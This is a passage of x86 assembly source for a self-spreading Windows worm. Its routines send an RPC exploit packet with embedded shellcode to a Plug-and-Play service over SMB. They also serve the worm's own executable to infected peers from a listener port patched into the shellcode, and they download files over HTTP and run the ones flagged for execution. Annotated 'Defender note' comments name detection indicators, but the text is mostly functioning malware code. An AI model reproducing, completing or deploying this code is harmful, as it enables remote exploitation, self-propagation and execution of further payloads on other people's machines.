    push SMB_PNPEndpoint_LEN
    push SMB_PNPEndpoint
    push ebx
    call send
    inc eax
    jz NEAR .cs

    push SMB_RECV_TIMEOUT
    push _recvbuf_LEN
    push edi
    call @arecv
    cmp eax, 10
    jle NEAR .cs
    cmp byte [edi + 9], 0
    jne NEAR .cs

;int3
    mov eax, 0x90909090
    mov ecx, (_packet_LEN/4)
    lea edi, [ebp - _packet]
    push edi
    rep stosd               ; fill the whole _packet buffer with 0x90
    pop edi

    push RPC_call_LEN
    push RPC_call
    push edi
    call memcpy             ; request header template at the start of _packet

    lea edi, [ebp - _packet + RPC_call_LEN]
    push shellcode_LEN
    push shellcode
    push edi
    call memcpy             ; payload right after it (its port field is patched by @FileServer)

    push RPC_call_end_LEN
    push RPC_call_end
    lea esi, [ebp - _packet + 2196 - RPC_call_end_LEN]
    push esi
    call memcpy             ; trailer placed so the request ends at byte 2196
    add esp, 36             ; three cdecl memcpy calls x 12 bytes of args

    push 0      ;send
    push 2196   ;`` ``      ; fixed request size: a stable on-the-wire indicator
    lea edi, [ebp - _packet]
    push edi    ;`` ``
    push ebx    ;`` ``
    call send               ; result not checked; the thread ends either way


    push SMB_RECV_TIMEOUT
    push _recvbuf_LEN
    lea eax, [ebp - _recvbuf]
    push eax
    call @arecv             ; wait for (and discard) a reply, up to SMB_RECV_TIMEOUT s

.cs
    push ebx
    call closesocket

.exit
    push byte -1
    call @AddThreadNum  ;dec THREADNUM

    push byte 0
    call ExitThread
  1190.  
  1191.  
  1192.  
;-----------------------------------------------------------------------
; @arecv - recv() guarded by a select() read timeout on one socket
; ARGS:  ebx = socket
; ARG1:  buffer
; ARG2:  length
; ARG3:  seconds timeout   (tv_usec is always 0)
; RETURN: eax = bytes received; 0 when select() timed out; -1 when
;         select() or recv() failed.  Callers in this file treat any
;         value <= 10 as failure.  Callee cleans the 3 args (ret 0xC).
; Clobb: eax, ecx, edx, flags
; Note:  the 260-byte local matches sizeof(fd_set) for the default
;        FD_SETSIZE of 64, but only fd_count and fd_array[0] are written.
;-----------------------------------------------------------------------
@arecv:
    push ebp
    mov ebp, esp

    sub esp, 260            ; fd_set slack, see header
    push ebx    ;fd_array[0]
    push 1      ;fd_count
    mov edx, esp            ; edx -> readfds

    xor eax, eax
    push eax                ; tv_usec = 0
    push DWORD [ebp + 0x10]     ;seconds timeout  -> tv_sec

    push esp            ;struct timeval
    push eax                ; exceptfds = NULL
    push eax                ; writefds  = NULL
    push edx                ; readfds
    push eax                ; nfds (ignored by Winsock)
    call select
    or eax, eax
    jle .end                ; 0 = timeout, -1 = error: returned as-is

    push 0                  ; flags
    push DWORD [ebp + 0xC]  ; length
    push DWORD [ebp + 0x8]  ; buffer
    push ebx
    call recv               ; eax = bytes received, or SOCKET_ERROR

.end
    leave
    ret 0xC
  1230.  
  1231.  
;-----------------------------------------------------------------------
; @convert_name - widen an ASCII string to 16-bit characters (each byte
;                 followed by a zero byte), filling the output back-to-front
; ARG1:  output buffer   (receives exactly 2 * strlen(input) bytes;
;        NO terminator is written)
; ARG2:  input buffer    (NUL-terminated ASCII)
; Stack: stdcall, ret 8.  ebx and edi are preserved; eax, ecx, edx and
;        flags are clobbered.
; The caller must size the output for 2 * strlen bytes; the only caller
; in this view writes into the 4 KiB _packet buffer of @AttackPnP.
;-----------------------------------------------------------------------
@convert_name:

    push ebp
    mov ebp, esp
    push ebx
    push edi

    cld
    or ecx, -1
    mov ebx, [ebp + 0xC]    ;input buffer
    mov edi, ebx
    xor eax, eax
    repne scasb             ; locate the NUL; ecx = -(len + 2)

    not ecx                 ; ecx = len + 1
    lea eax, [ecx + ecx - 2]   ; eax = 2 * len = output size
    sub ecx, 2              ; ecx = len - 1 = index of the last input char
    add eax, [ebp + 8]  ;output buffer    ; eax -> one past the output end
    lea edx, [eax - 1]      ; edx -> last output byte

.1
    cmp ecx, -1             ; done once every input char has been copied
    je .end

    mov byte [edx], 0       ; high byte of the 16-bit char
    dec edx
    movzx eax, byte [ecx + ebx]
    dec ecx
    mov byte [edx], al      ; low byte = the ASCII char
    dec edx

    jmp short .1

.end
    pop edi
    pop ebx
    leave
    ret 8
  1273.  
  1274.  
;-----------------------------------------------------------------------
; @AddThreadNum - add the pushed delta to the global THREADNUM while
;                 holding CS_THREADNUM
; ARGS: 1 inc    -1 dec   (one dword pushed by the caller, removed here)
; Registers used: ALL   (eax and ebx explicitly, plus whatever
;                 Enter/LeaveCriticalSection clobber - callers must not
;                 keep live values in eax/ebx across this call)
; The argument is popped from under the return address, so the call site
; does no stack cleanup of its own.
;-----------------------------------------------------------------------
@AddThreadNum:
    pop eax     ;RET/clean stack   ; eax = return address
    pop ebx                         ; ebx = delta (+1 / -1)
    push eax                        ; return address back on top

    push CS_THREADNUM               ; &CRITICAL_SECTION, defined outside this view
    call EnterCriticalSection

        add dword [THREADNUM], ebx  ;THREADNUM   ; the only writer of THREADNUM in this view

    push CS_THREADNUM
    call LeaveCriticalSection
    ret
  1291.  
  1292.  
;-----------------------------------------------------------------------
; @WaitMaxThreads - throttle: sleep TIMEOUT ms in a loop until THREADNUM
;                   is MAX_THREADS or below
; No args.  Clobbers flags and whatever Sleep clobbers (eax, ecx, edx).
; Note: THREADNUM is read without CS_THREADNUM and the test is not atomic
;       with the increment in @AddThreadNum, so the cap is approximate -
;       several waiters may pass at the same time.
;-----------------------------------------------------------------------
@WaitMaxThreads:
.loop1
    cmp dword [THREADNUM], MAX_THREADS
    jle .end                ; signed compare: THREADNUM <= MAX_THREADS -> proceed
    push dword TIMEOUT
    call Sleep

    jmp short .loop1
.end
    ret
  1303.  
  1304.  
;-----------------------------------------------------------------------
; @ServerThread - one @FileServer connection: send the mapped copy of this
;                 executable (dwFilePointer / dwFileSize, set by
;                 @FileServer) to the client, then close the socket
; ARG1:  client socket   ([ebp + 4] = the CreateThread lpParameter)
; Never returns (ExitThread).  A single send() is issued and its result
; is ignored, so the transfer is whatever send() accepts in one call.
; Defender note: this is the distribution channel - an infected host
; serves its own image to anyone connecting to the listener port; a
; process sending its own file bytes over a socket is a host indicator.
;-----------------------------------------------------------------------
@ServerThread:
    mov ebp, esp

    mov ebx, [ebp + 4]  ;client socket
    push ebx                ; kept on the stack for closesocket below

    push 0                  ; flags
    push DWORD [dwFileSize]
    push DWORD [dwFilePointer]
    push ebx
    call send

    call closesocket        ; consumes the ebx pushed above

    push 0
    call ExitThread
  1322.  
  1323.  
  1324.  
;-----------------------------------------------------------------------
; @FileServer - thread: map this executable read-only and hand it to every
;               TCP client on an OS-assigned port (see @ServerThread)
; No args; ebp = esp on entry; never returns (the accept loop is infinite;
; the trailing `call ExitThread` is unreachable).
; Side effects:
;   dwFileSize / dwFilePointer  - size and read-only view of the module image
;   shellcode + SHELLCODE_PORT  - patched with the listener port XORed with
;       SHELLCODE_XORPORT, so the payload sent by @AttackPnP carries the
;       port of this listener (presumably to fetch the binary from it)
; Unchecked results: socket, bind, getsockname, listen, CreateFileMapping,
; MapViewOfFile.  When CreateFile fails the listener still starts and
; dwFileSize / dwFilePointer keep whatever they held before.
; Defender note: a process that maps its own image and listens on an
; ephemeral port on all interfaces (INADDR_ANY, port 0) is the host-side
; indicator for this routine.
;-----------------------------------------------------------------------
@FileServer:
    mov ebp, esp
;int3
    xor eax, eax
    push eax                ; CreateFile: hTemplateFile
    push eax                ; dwFlagsAndAttributes
    push OPEN_EXISTING
    push eax                ; lpSecurityAttributes
    push FILE_SHARE_READ
    push GENERIC_READ
    mov esi, szFileName     ; global path buffer, filled just below
    push esi                ; lpFileName

    push dwFileNameLen
    push esi
    push eax                ; hModule = NULL -> path of this executable
    call GetModuleFileName

    call CreateFile         ; consumes the 7 args pushed above
    mov esi, eax
    inc eax
    jz .sock1               ; INVALID_HANDLE_VALUE: skip the mapping

    xor eax, eax
    push eax        ;MapViewOfFile   dwNumberOfBytesToMap (0 = whole mapping)
    push eax        ;`` ``           dwFileOffsetLow
    push eax        ;`` ``           dwFileOffsetHigh

    push eax        ;CreateFileMapping   lpName = NULL

    push eax                ; lpFileSizeHigh = NULL
    push esi
    call GetFileSize
    mov [dwFileSize], eax

    push eax                ; dwMaximumSizeLow = file size
    push 0                  ; dwMaximumSizeHigh
    push PAGE_READONLY
    push 0                  ; lpAttributes
    push esi
    call CreateFileMapping

    push FILE_MAP_READ
    push eax                ; hFileMappingObject
    call MapViewOfFile

    mov [dwFilePointer], eax


.sock1
    xor eax, eax
    push eax                ; sockaddr_in: sin_zero
    push eax
    push eax                ; sin_addr = INADDR_ANY
    push 2                  ; sin_family = AF_INET, sin_port = 0 (OS picks)

    push eax
    push 1
    push 2
    call socket             ; socket(AF_INET, SOCK_STREAM, 0)
    xchg ebx, eax           ; ebx = listening socket

    mov edx, esp

    push 0x10
    push edx
    push ebx
    call bind

    mov edx, esp            ; reuse the sockaddr_in as the getsockname buffer
    push 0x10               ; namelen

    push esp                ; &namelen
    push edx                ; &name
    push ebx
    call getsockname
    pop edx                 ; discard namelen
    pop edx                 ; edx = sin_family | sin_port << 16
    shr edx, 16             ; dx = assigned port (network byte order)


;SHELLCODE PORT
    xor dx, SHELLCODE_XORPORT
    mov WORD [shellcode + SHELLCODE_PORT], dx   ; patch the port into the payload template

    push SOMAXCONN
    push ebx
    call listen

.acceptLoop
    push 1
    call Sleep              ; 1 ms pause per iteration

    push 0                  ; addrlen
    push 0                  ; addr
    push ebx
    call accept
    cmp eax, -1             ; INVALID_SOCKET -> retry
    je .acceptLoop

    xor ecx, ecx
    push esp                ; lpThreadId (scratch dword on this stack)
    push ecx                ; dwCreationFlags
    push eax        ;client socket   lpParameter
    push @ServerThread
    push ecx                ; dwStackSize
    push ecx                ; lpThreadAttributes
    call CreateThread
    push eax
    call CloseHandle        ; handle dropped; the thread keeps running

    jmp short .acceptLoop       ;infinite loop
    call ExitThread         ; unreachable
  1438.  
  1439.  
  1440.  
;-----------------------------------------------------------------------
; @GetUrl - plain-HTTP download of one URL into the current directory
; ARGS:      edi = url   (ASCII "host/path" with no scheme, judging by
;            the '/' scans below)
; RETURN:    ebx = filename saved  (pointer into the url just after its
;            last '/'), or 0 when name lookup failed or returned no
;            address
; Frame: [ebp-4] url, [ebp-8] DL_FILENAME, [ebp-0xC] HTTP_NEWLINE flag,
;        then a 16-aligned alloca holding the NUL-terminated host name
; Clobb: eax, ecx, edx, esi, edi, flags
; Behaviour: formats "GET <path> HTTP/1.1\r\nHost: <host>\r\n\r\n" into
; the global HTTP_BUFFER, connects to port 80 of the first address from
; gethostbyname, skips the response headers up to the first "\r\n\r\n"
; and writes everything after it to a file named after the URL's last
; path component (CREATE_ALWAYS, relative to the cwd).  The status line
; is not checked, so an error page body is saved as well.  Chunks (from
; @arecv, 60 s timeout) that are still inside the headers and do not
; contain the blank line are dropped whole.
; Defender notes: the request carries only a Host header, and the file
; is written to the process's working directory - both usable as
; detection points (proxy logs, file-creation telemetry).
;-----------------------------------------------------------------------
@GetUrl:
    push ebp
    mov ebp, esp
    push edi    ;[ebp - 4]
    xor ecx, ecx
    push ecx    ;[ebp - 8]
    push ecx    ;[ebp - 0xC]

%define     DL_FILENAME [ebp - 8]
%define     HTTP_NEWLINE    [ebp - 0xC]

    mov al, '/'
    dec ecx                 ; ecx = -1: unbounded scan
    cld
    repne scasb             ; edi -> just past the first '/'
    not ecx                 ; ecx = host length + 1
    sub esp, ecx            ; alloca for the host name
    AND esp, 0xfffffff0     ; keep esp 16-byte aligned

    dec ecx                 ; ecx = host length
    mov esi, [ebp - 4]
    mov edi, esp
    rep movsb               ; copy the host; esi now points at the '/'
    mov BYTE [edi], cl      ; cl is 0 after rep -> NUL terminator


    push esp    ;host
    push esi    ;url   (the path part, starting at '/')
    push HTTP_FMT   ;'GET %s HTTP/1.1\r\nHost: %s\r\n\r\n'
    push HTTP_BUFFER
    call wsprintf
    add esp, 16             ; cdecl cleanup


    push esp                ; host name buffer
    call gethostbyname

    or eax, eax
    jz .end                 ; lookup failed: ebx = DL_FILENAME = 0
    mov esi, [eax + 12]     ; hostent.h_addr_list
    lodsd                   ; first entry
    or eax, eax
    jz .end                 ; empty address list
    mov edx, [eax]          ; in_addr of the first address

    xor eax, eax
    push eax                ; sin_zero
    push eax
    push edx                ; sin_addr
    push DWORD (2 | ((((80 << 8) & 0xFF00) | ((80 >> 8) & 0xFF)) << 16) )   ; AF_INET, htons(80)

    push eax
    push 1
    push 2
    call socket
    xchg ebx, eax           ; ebx = socket

    mov edx, esp
    push 0x10
    push edx
    push ebx
    call connect
    or eax, eax
    jnz .cs                 ; connect failed

    mov edi, [ebp - 4]
    push edi
    call lstrlen
    add edi, eax            ; edi -> terminating NUL of the url
    std                     ; scan backwards ...
    mov al, '/'
    or ecx, -1
    repne scasb             ; ... for the last '/'
    cld
    inc edi                 ; with DF=1 scasb leaves edi one before the match;
    inc edi                 ; +2 -> first char of the file name
    mov DL_FILENAME, edi

    xor eax, eax
    push eax                ; hTemplateFile
    push eax                ; dwFlagsAndAttributes
    push CREATE_ALWAYS      ; truncates an existing file of that name
    push eax                ; lpSecurityAttributes
    push FILE_SHARE_READ
    push GENERIC_WRITE
    push edi                ; relative name -> current directory
    call CreateFile
    mov esi, eax            ; esi = output file handle
    inc eax
    jz .cs                  ; INVALID_HANDLE_VALUE

    push 0                  ; flags
    mov edi, HTTP_BUFFER
    push edi
    call lstrlen
    push eax                ; request length
    push edi
    push ebx
    call send               ; result not checked


.recvLoop
    mov edi, HTTP_BUFFER
    push 60                 ; seconds
    push HTTP_BUFFER_LEN
    push edi
    call @arecv
    or eax, eax
    jle .recvEnd            ; EOF, timeout or error

    cmp BYTE HTTP_NEWLINE, 0
    jne .write              ; headers already consumed: write the chunk as-is

.1
    mov ecx, 0x0A0D0A0D     ; "\r\n\r\n" as a little-endian dword
    cmp [edi], ecx
    je .2

    dec eax
    cmp eax, 3
    jle .recvLoop           ; fewer than 4 bytes left: drop the rest of this chunk

    inc edi
    jmp short .1
.2
    add edi, 4              ; step over the blank line
    sub eax, 4
    inc BYTE HTTP_NEWLINE   ; body has started

.write
    push 0                  ; lpOverlapped
    push esp                ; lpNumberOfBytesWritten -> the slot just pushed (scratch)
    push eax                ; bytes
    push edi
    push esi
    call WriteFile          ; result not checked
    jmp short .recvLoop

.recvEnd
    push esi
    call CloseHandle

.cs
    push ebx
    call closesocket


.end
    mov ebx, DL_FILENAME
    leave
    ret
  1595.  
  1596.  
;-----------------------------------------------------------------------
; @Download - walk the URLS table: fetch each entry with @GetUrl and run
;             the saved file when the entry is flagged FL_EXECUTE_URL
; Table layout (as read by the scans below): NUL-terminated url strings,
; each followed by one flag byte (FL_EXECUTE_URL / FL_NOEXEC_URL); an
; empty string ends the table.  URLS itself is defined outside this view.
; No args; clobbers eax, ebx, ecx, esi, edi, flags and whatever the APIs
; clobber.  Execution is CreateProcess(lpApplicationName = file name from
; @GetUrl, all other pointer/flag args NULL/0) with a zeroed STARTUPINFO
; at [ebp-0x44] and the PROCESS_INFORMATION at [ebp-0x54]; both returned
; handles are closed right away.
; Defender note: this is the stage-two fetch-and-run; the child is
; launched from the cwd with no command line, which makes the parent/
; child pairing distinctive in process-creation telemetry.
;-----------------------------------------------------------------------
@Download:
    push ebp
    mov ebp, esp

    mov edi, URLS

.nextUrl
    cmp byte [edi], 0       ; end-of-table marker
    je .end

    push edi                ; preserve the table cursor across @GetUrl
    call @GetUrl            ; ebx = file name, or 0

    pop edi
    xor eax, eax
    or ecx, -1
    cld
    repne scasb             ; edi -> the flag byte after the url

    mov al, FL_EXECUTE_URL
    scasb                   ; compare the flag; edi -> next entry
    jne .nextUrl            ; not flagged for execution

    or ebx, ebx
    jz .nextUrl             ; no file name: download never got that far

;execute file
    lea esp, [ebp - 0x54]   ; PROCESS_INFORMATION (16 bytes) + STARTUPINFO (0x44)
    push esp                ; lpProcessInformation -> [ebp-0x54]

    mov esi, edi            ; keep the table cursor in esi
    lea edi, [ebp - 0x44]   ; STARTUPINFO

    push edi                ; lpStartupInfo
    push byte 0x44
    pop ecx
    mov [edi], ecx          ; si.cb = sizeof(STARTUPINFO)
    inc edi
    xor eax, eax
    rep stosb               ; zero the remaining STARTUPINFO bytes

    mov cl, 7
.push0
    push eax                ; lpCurrentDirectory .. lpCommandLine: seven NULL/0 args
    loop .push0

    push ebx                ; lpApplicationName = the downloaded file
    call CreateProcess
    call CloseHandle        ; pops pi.hProcess, now at [esp]
    call CloseHandle        ; pops pi.hThread

    mov edi, esi            ; restore the table cursor
    jmp short .nextUrl


.end
    leave
    ret
  1655.  
  1656.  
%include        "CBack.asm"     ; pulled in verbatim at this point; not visible in this view



VIRUS_SIZE      EQU         ($- _entry)     ; assembly-time size of everything from _entry (defined earlier, outside this view) up to here